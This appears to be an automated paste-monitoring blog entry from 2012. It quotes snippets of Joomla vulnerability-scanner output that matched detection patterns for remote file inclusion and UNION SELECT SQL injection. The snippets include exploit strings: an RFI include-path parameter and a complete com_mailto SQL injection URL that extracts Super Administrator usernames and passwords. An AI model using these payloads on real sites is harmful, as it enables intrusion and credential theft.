Detected 1 occurrence(s) of ‘remote file inclusion’:

 Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability 
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability 
Versions effected: 1.0.0 
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability 
Versions effected: 1.0.13 <=
Check: /admini

Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:

xploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No

# 24
Info -> CoreComponent: MailTo SQL Injection Vulnerability 
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 25
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability 
Versions effected: Joomla! 1.5.0 RC3
Chec

Source: http://pastebin.com/raw.php?i=HettSUWU

Tags: pastebin.com, Remote File Inclusion, SQL Injection

This entry was posted on Monday, June 25th, 2012 at 04:50 and is filed under PasteMon. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.